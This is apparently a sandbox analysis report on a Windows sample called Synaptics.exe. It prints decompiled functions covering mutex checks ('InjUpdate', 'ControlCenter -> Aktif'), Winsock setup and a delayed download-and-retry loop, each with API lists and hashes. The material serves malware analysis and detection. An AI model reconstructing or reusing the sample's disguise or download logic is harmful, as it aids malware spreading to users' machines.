                                                                                                                                                                                                                            0x0049a504
                                                                                                                                                                                                                            0x0049a50b
                                                                                                                                                                                                                            0x0049a5ac
                                                                                                                                                                                                                            0x0049a511
                                                                                                                                                                                                                            0x0049a513
                                                                                                                                                                                                                            0x0049a51a
                                                                                                                                                                                                                            0x0049a528
                                                                                                                                                                                                                            0x0049a538
                                                                                                                                                                                                                            0x0049a542
                                                                                                                                                                                                                            0x0049a545
                                                                                                                                                                                                                            0x0049a54f
                                                                                                                                                                                                                            0x0049a552
                                                                                                                                                                                                                            0x0049a55c
                                                                                                                                                                                                                            0x0049a55f
                                                                                                                                                                                                                            0x0049a569
                                                                                                                                                                                                                            0x0049a56c
                                                                                                                                                                                                                            0x0049a576
                                                                                                                                                                                                                            0x0049a579
                                                                                                                                                                                                                            0x0049a583
                                                                                                                                                                                                                            0x0049a586
                                                                                                                                                                                                                            0x0049a58b
                                                                                                                                                                                                                            0x0049a594
                                                                                                                                                                                                                            0x0049a595
                                                                                                                                                                                                                            0x0049a59e
                                                                                                                                                                                                                            0x0049a52a
                                                                                                                                                                                                                            0x0049a52c
                                                                                                                                                                                                                            0x0049a52c
                                                                                                                                                                                                                            0x0049a528
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0049a50b
                                                                                                                                                                                                                            0x0049a47d
                                                                                                                                                                                                                            0x0049a494
                                                                                                                                                                                                                            0x0049a496
                                                                                                                                                                                                                            0x0049a498
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0049a49a
                                                                                                                                                                                                                            0x0049a49a
                                                                                                                                                                                                                            0x0049a49b
                                                                                                                                                                                                                            0x0049a4a0
                                                                                                                                                                                                                            0x0049a4b7
                                                                                                                                                                                                                            0x0049a4bc
                                                                                                                                                                                                                            0x0049a4c4
                                                                                                                                                                                                                            0x0049a4ca
                                                                                                                                                                                                                            0x0049a4d5
                                                                                                                                                                                                                            0x0049a4dd
                                                                                                                                                                                                                            0x0049a4de
                                                                                                                                                                                                                            0x0049a4e6
                                                                                                                                                                                                                            0x0049a4eb
                                                                                                                                                                                                                            0x0049a4ed
                                                                                                                                                                                                                            0x0049a4f4
                                                                                                                                                                                                                            0x0049a4f4
                                                                                                                                                                                                                            0x0049a4f9
                                                                                                                                                                                                                            0x0049a4f9
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A48F
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MutexOpen$CloseHandle
                                                                                                                                                                                                                            • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                                                                                                                                                                                            • API String ID: 1942958553-1737343353
                                                                                                                                                                                                                            • Opcode ID: 1a9573ad0b493aa6f71594b65027ac5b08455cbac32612747bfd3d13cb684c94
                                                                                                                                                                                                                            • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a9573ad0b493aa6f71594b65027ac5b08455cbac32612747bfd3d13cb684c94
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004590AC Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E004590AC(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403F10(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E00421B3C(_t91, 0);
				_t42 =  *0x49dabc; // 0x49b520
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x49dabc; // 0x49b520
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x45a814;
				}
				_t43 =  *0x49dc10; // 0x49b528
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x49dc10; // 0x49b528
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0045AA0C;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E0042B3F8(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49d93c; // 0x49e030
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042B7C8(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
				_t60 =  *0x49d93c; // 0x49e030
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040E020(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00409FC4( &_v261, _t27);
				}
				_t69 = E0040E048( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x45150c
				E00404C30(_t31, 0x100,  &_v261);
				_t75 =  *0x49d6e4; // 0x49e038
				if( *_t75 == 0) {
					E004593B4(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0045B188(_t90, 0x100);
				E0045BB4C(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403F68(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                                                                                                                                                                            0x004590ac
                                                                                                                                                                                                                            0x004590ac
                                                                                                                                                                                                                            0x004590b9
                                                                                                                                                                                                                            0x004590bb
                                                                                                                                                                                                                            0x004590be
                                                                                                                                                                                                                            0x004590be
                                                                                                                                                                                                                            0x004590c3
                                                                                                                                                                                                                            0x004590c6
                                                                                                                                                                                                                            0x004590cc
                                                                                                                                                                                                                            0x004590d1
                                                                                                                                                                                                                            0x004590db
                                                                                                                                                                                                                            0x004590dd
                                                                                                                                                                                                                            0x004590e2
                                                                                                                                                                                                                            0x004590e5
                                                                                                                                                                                                                            0x004590e5
                                                                                                                                                                                                                            0x004590eb
                                                                                                                                                                                                                            0x004590f5
                                                                                                                                                                                                                            0x004590f7
                                                                                                                                                                                                                            0x004590fc
                                                                                                                                                                                                                            0x004590ff
                                                                                                                                                                                                                            0x004590ff
                                                                                                                                                                                                                            0x00459105
                                                                                                                                                                                                                            0x00459115
                                                                                                                                                                                                                            0x00459127
                                                                                                                                                                                                                            0x0045912f
                                                                                                                                                                                                                            0x00459134
                                                                                                                                                                                                                            0x0045913a
                                                                                                                                                                                                                            0x00459141
                                                                                                                                                                                                                            0x00459148
                                                                                                                                                                                                                            0x0045914e
                                                                                                                                                                                                                            0x00459154
                                                                                                                                                                                                                            0x0045915b
                                                                                                                                                                                                                            0x00459162
                                                                                                                                                                                                                            0x00459169
                                                                                                                                                                                                                            0x0045917c
                                                                                                                                                                                                                            0x0045917e
                                                                                                                                                                                                                            0x00459189
                                                                                                                                                                                                                            0x00459191
                                                                                                                                                                                                                            0x0045919a
                                                                                                                                                                                                                            0x0045919f
                                                                                                                                                                                                                            0x0045919f
                                                                                                                                                                                                                            0x004591a5
                                                                                                                                                                                                                            0x004591a8
                                                                                                                                                                                                                            0x004591bb
                                                                                                                                                                                                                            0x004591c3
                                                                                                                                                                                                                            0x004591d6
                                                                                                                                                                                                                            0x004591e3
                                                                                                                                                                                                                            0x004591ea
                                                                                                                                                                                                                            0x004591ec
                                                                                                                                                                                                                            0x004591f5
                                                                                                                                                                                                                            0x004591f5
                                                                                                                                                                                                                            0x00459202
                                                                                                                                                                                                                            0x00459209
                                                                                                                                                                                                                            0x0045920b
                                                                                                                                                                                                                            0x0045920b
                                                                                                                                                                                                                            0x00459216
                                                                                                                                                                                                                            0x0045921b
                                                                                                                                                                                                                            0x0045922c
                                                                                                                                                                                                                            0x00459231
                                                                                                                                                                                                                            0x00459239
                                                                                                                                                                                                                            0x0045923d
                                                                                                                                                                                                                            0x0045923d
                                                                                                                                                                                                                            0x00459242
                                                                                                                                                                                                                            0x00459246
                                                                                                                                                                                                                            0x0045924a
                                                                                                                                                                                                                            0x0045924e
                                                                                                                                                                                                                            0x00459257
                                                                                                                                                                                                                            0x0045925f
                                                                                                                                                                                                                            0x00459266
                                                                                                                                                                                                                            0x0045926b
                                                                                                                                                                                                                            0x00459271
                                                                                                                                                                                                                            0x00459273
                                                                                                                                                                                                                            0x00459278
                                                                                                                                                                                                                            0x0045927f
                                                                                                                                                                                                                            0x00459289

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                            • OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                            • CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000), ref: 00459216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                            • String ID: 0I$8I$MAINICON
                                                                                                                                                                                                                            • API String ID: 3935243913-3756263232
                                                                                                                                                                                                                            • Opcode ID: e12e7c4e14c8ae78d78a3e87ed0ee263b2f40a02330ede6867088e6f1150a5ad
                                                                                                                                                                                                                            • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e12e7c4e14c8ae78d78a3e87ed0ee263b2f40a02330ede6867088e6f1150a5ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047B898 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63libraryloadernetworkCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E0047B898(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _t19;
				intOrPtr _t26;
				void* _t30;
				intOrPtr _t42;
				void* _t51;

				_push(__ebx);
				_v8 = 0;
				_v12 = 0;
				_push(_t51);
				_push(0x47b965);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				if( *0x49c9fc == 0) {
					 *0x49c9fc = LoadLibraryA("WS2_32.DLL");
					if( *0x49c9fc == 0) {
						_push(GetLastError());
						_push( &_v8);
						_t26 =  *0x49d8e0; // 0x47a5e4
						E00406A70(_t26,  &_v12);
						_push(_v12);
						_v20 = "WS2_32.DLL";
						_v16 = 0xb;
						_pop(_t30);
						E0040A664(_t30, 0,  &_v20);
						E0047A93C(__ebx, _v8, 1, __edi, __esi);
						E00404378();
					}
					_t19 =  *0x49c9fc; // 0x75cd0000
					 *0x49ee80 = GetProcAddress(_t19, "WSAStartup");
					 *0x49ee80(_a4, _a8); // executed
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x47b96c);
				return E004049E4( &_v12, 2);
			}












                                                                                                                                                                                                                            0x0047b89e
                                                                                                                                                                                                                            0x0047b8a1
                                                                                                                                                                                                                            0x0047b8a4
                                                                                                                                                                                                                            0x0047b8a9
                                                                                                                                                                                                                            0x0047b8aa
                                                                                                                                                                                                                            0x0047b8af
                                                                                                                                                                                                                            0x0047b8b2
                                                                                                                                                                                                                            0x0047b8bc
                                                                                                                                                                                                                            0x0047b8cc
                                                                                                                                                                                                                            0x0047b8d8
                                                                                                                                                                                                                            0x0047b8df
                                                                                                                                                                                                                            0x0047b8e3
                                                                                                                                                                                                                            0x0047b8e7
                                                                                                                                                                                                                            0x0047b8ec
                                                                                                                                                                                                                            0x0047b8f4
                                                                                                                                                                                                                            0x0047b8fa
                                                                                                                                                                                                                            0x0047b8fd
                                                                                                                                                                                                                            0x0047b906
                                                                                                                                                                                                                            0x0047b907
                                                                                                                                                                                                                            0x0047b916
                                                                                                                                                                                                                            0x0047b91b
                                                                                                                                                                                                                            0x0047b91b
                                                                                                                                                                                                                            0x0047b925
                                                                                                                                                                                                                            0x0047b930
                                                                                                                                                                                                                            0x0047b93e
                                                                                                                                                                                                                            0x0047b944
                                                                                                                                                                                                                            0x0047b94c
                                                                                                                                                                                                                            0x0047b94f
                                                                                                                                                                                                                            0x0047b952
                                                                                                                                                                                                                            0x0047b964

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8C7
                                                                                                                                                                                                                            • GetLastError.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8DA
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75CD0000,WSAStartup), ref: 0047B92B
                                                                                                                                                                                                                            • WSAStartup.WS2_32(?,?,75CD0000,WSAStartup,WS2_32.DLL,00000000,0047B965), ref: 0047B93E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Load$AddressErrorLastLibraryProcStartupString
                                                                                                                                                                                                                            • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                                                                                                                                                                                                            • API String ID: 4221839523-1314211545
                                                                                                                                                                                                                            • Opcode ID: 6c5734486e13fb394c9afae55c5ff24803e84e5bca5e4d3926a118303e1b0425
                                                                                                                                                                                                                            • Instruction ID: c181d5f6f94ff0715040a16c2373e5647a9c70682208e90bacd88f35eee9369f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c5734486e13fb394c9afae55c5ff24803e84e5bca5e4d3926a118303e1b0425
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3218EF1904204AFCB00EFA5C885B9EB7F8E758314F11C97BE618E3291D77859008B99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00434530 Relevance: 12.1, APIs: 8, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 669 434530-43457b 73C9AC50 GetTextMetricsA call 424e24 SelectObject GetTextMetricsA SelectObject 73C9B380 672 43459f-4345a8 669->672 673 43457d-434584 669->673 676 4345aa 672->676 677 4345ac-4345b8 GetSystemMetrics 672->677 674 434586-43458b 673->674 675 43458d 673->675 678 434592-43459d GetSystemMetrics 674->678 675->678 676->677 679 4345ba 677->679 680 4345bd-4345c2 677->680 681 4345c4-4345d7 call 43a75c 678->681 679->680 680->681
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* _t14;
				char* _t18;
				signed int _t19;
				signed int _t21;
				struct HDC__* _t27;
				signed int _t28;
				signed int _t30;
				signed int _t31;
				void* _t32;
				struct HDC__* _t38;
				struct tagTEXTMETRICA* _t40;

				_t40 =  &_v112;
				_t38 = __eax;
				_push(0);
				L00407638();
				_t27 = __eax;
				GetTextMetricsA(__eax, _t40);
				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth)); // executed
				SelectObject(_t27, _t14);
				_push(_t27);
				_push(0);
				L00407888();
				_t18 =  *0x49da40; // 0x49eb1c
				if( *_t18 == 0) {
					_t28 = _t40->tmHeight;
					_t19 = _v112.tmHeight;
					if(_t28 > _t19) {
						_t28 = _t19;
					}
					_t21 = GetSystemMetrics(6) << 2;
					if(_t28 < 0) {
						_t28 = _t28 + 3;
					}
					_t30 = _t21 + (_t28 >> 2);
				} else {
					if( *((char*)(_t38 + 0x1a5)) == 0) {
						_t31 = 6;
					} else {
						_t31 = 8;
					}
					_t30 = GetSystemMetrics(6) * _t31;
				}
				return E0043A75C(_t38, _v112 + _t30);
			}
















                                                                                                                                                                                                                            0x00434533
                                                                                                                                                                                                                            0x00434536
                                                                                                                                                                                                                            0x00434538
                                                                                                                                                                                                                            0x0043453a
                                                                                                                                                                                                                            0x0043453f
                                                                                                                                                                                                                            0x00434543
                                                                                                                                                                                                                            0x00434552
                                                                                                                                                                                                                            0x0043455f
                                                                                                                                                                                                                            0x00434566
                                                                                                                                                                                                                            0x0043456b
                                                                                                                                                                                                                            0x0043456c
                                                                                                                                                                                                                            0x0043456e
                                                                                                                                                                                                                            0x00434573
                                                                                                                                                                                                                            0x0043457b
                                                                                                                                                                                                                            0x0043459f
                                                                                                                                                                                                                            0x004345a2
                                                                                                                                                                                                                            0x004345a8
                                                                                                                                                                                                                            0x004345aa
                                                                                                                                                                                                                            0x004345aa
                                                                                                                                                                                                                            0x004345b3
                                                                                                                                                                                                                            0x004345b8
                                                                                                                                                                                                                            0x004345ba
                                                                                                                                                                                                                            0x004345ba
                                                                                                                                                                                                                            0x004345c2
                                                                                                                                                                                                                            0x0043457d
                                                                                                                                                                                                                            0x00434584
                                                                                                                                                                                                                            0x0043458d
                                                                                                                                                                                                                            0x00434586
                                                                                                                                                                                                                            0x00434586
                                                                                                                                                                                                                            0x00434586
                                                                                                                                                                                                                            0x0043459b
                                                                                                                                                                                                                            0x0043459b
                                                                                                                                                                                                                            0x004345d7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0043453A
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                                                                                                                                                                                              • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00434594
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 004345AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3751190600-0
                                                                                                                                                                                                                            • Opcode ID: a7376c866b0e0f4c459314af59490de973a59b0eadc7fa28dbc4798c05a2bd8b
                                                                                                                                                                                                                            • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7376c866b0e0f4c459314af59490de973a59b0eadc7fa28dbc4798c05a2bd8b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00497CF0 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 323sleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00497CF0(intOrPtr* __ebx, void* __edx, void* __edi, intOrPtr __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void* _t84;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				void* _t96;
				intOrPtr _t100;
				intOrPtr _t105;
				intOrPtr _t112;
				char _t113;
				intOrPtr _t119;
				intOrPtr _t121;
				char _t122;
				void* _t129;
				intOrPtr _t172;
				void* _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t178;
				void* _t185;
				char _t192;
				void* _t193;
				void* _t210;
				intOrPtr _t224;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t249;
				intOrPtr _t252;
				intOrPtr _t255;
				intOrPtr _t258;
				intOrPtr _t261;
				intOrPtr _t265;
				intOrPtr _t273;
				intOrPtr _t274;
				void* _t281;
				void* _t291;

				_t291 = __fp0;
				_t267 = __esi;
				_t266 = __edi;
				_t191 = __ebx;
				_t273 = _t274;
				_t193 = 0xa;
				do {
					_push(0);
					_push(0);
					_t193 = _t193 - 1;
				} while (_t193 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t273);
				_push(0x49814b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				Sleep(0xea60); // executed
				E004737B0( &_v28);
				_push(_v28);
				_push(0x498164);
				E00472D44(9, __ebx, _t193,  &_v32, __esi); // executed
				_push(_v32);
				_push(".exe");
				E00404D40();
				E004737B0( &_v36);
				_push(_v36);
				_push(0x498164);
				E00472D44(7, __ebx, _t193,  &_v40, __esi);
				_push(_v40);
				_push(".ini");
				E00404D40();
				_v21 = 0;
				if(E00474D34(_t193) == 0) {
					L44:
					_pop(_t224);
					 *[fs:eax] = _t224;
					_push(E00498152);
					E004049E4( &_v84, 0xf);
					E004049C0( &_v20);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = 1;
					while(1) {
						_t84 = _v16 - 1;
						if(_t84 == 0) {
							_t227 =  *0x49f174; // 0x21e3020
							E00404A58( &_v20, _t227);
						} else {
							_t185 = _t84 - 1;
							if(_t185 == 0) {
								_t232 =  *0x49f174; // 0x21e3020
								E00404A58( &_v20, _t232);
							} else {
								if(_t185 == 1) {
									_t233 =  *0x49f174; // 0x21e3020
									E00404A58( &_v20, _t233);
								}
							}
						}
						_push(_t273);
						_push(0x497f86);
						_push( *[fs:eax]);
						 *[fs:eax] = _t274;
						_t88 =  *0x49f13c; // 0x21e2354
						E004967D4(_t88, _t191, 0x498190);
						_t91 = E00474D50(_v20, _t191, _v8, _t267); // executed
						_t280 = _t91;
						if(_t91 != 0) {
							break;
						}
						_t92 =  *0x49f13c; // 0x21e2354
						E004967D4(_t92, _t191, 0x4981ec);
						_pop(_t231);
						 *[fs:eax] = _t231;
						_v16 = _v16 + 1;
						__eflags = _v16 - 4;
						if(_v16 != 4) {
							continue;
						} else {
							L18:
							if(_v21 == 0) {
								goto L44;
							}
							_v16 = 1;
							while(1) {
								_t96 = _v16 - 1;
								if(_t96 == 0) {
									_t234 =  *0x49f168; // 0x21e30f4
									E00404A58( &_v20, _t234);
								} else {
									_t129 = _t96 - 1;
									if(_t129 == 0) {
										_t238 =  *0x49f16c; // 0x21e314c
										E00404A58( &_v20, _t238);
									} else {
										if(_t129 == 1) {
											_t239 =  *0x49f170; // 0x21e3198
											E00404A58( &_v20, _t239);
										}
									}
								}
								_push(_t273);
								_push(0x498104);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t100 =  *0x49f13c; // 0x21e2354
								E004967D4(_t100, _t191, 0x49820c);
								if(E00474D50(_v20, _t191, _v12, _t267) != 0) {
									break;
								}
								_pop(_t237);
								_pop(_t210);
								 *[fs:eax] = _t237;
								_v16 = _v16 + 1;
								__eflags = _v16 - 4;
								if(_v16 != 4) {
									continue;
								} else {
									goto L44;
								}
							}
							_t105 =  *0x49f13c; // 0x21e2354
							E0049A3E0(_t105, _t191, 0, _t266, _t267, _t291);
							if( *0x49f148 == 0) {
								__eflags =  *0x49f149;
								if(__eflags == 0) {
									_t192 = 0;
									__eflags = 0;
								} else {
									_t192 = 1;
								}
							} else {
								_t192 = 1;
							}
							_push(_t273);
							_push(0x4980e6);
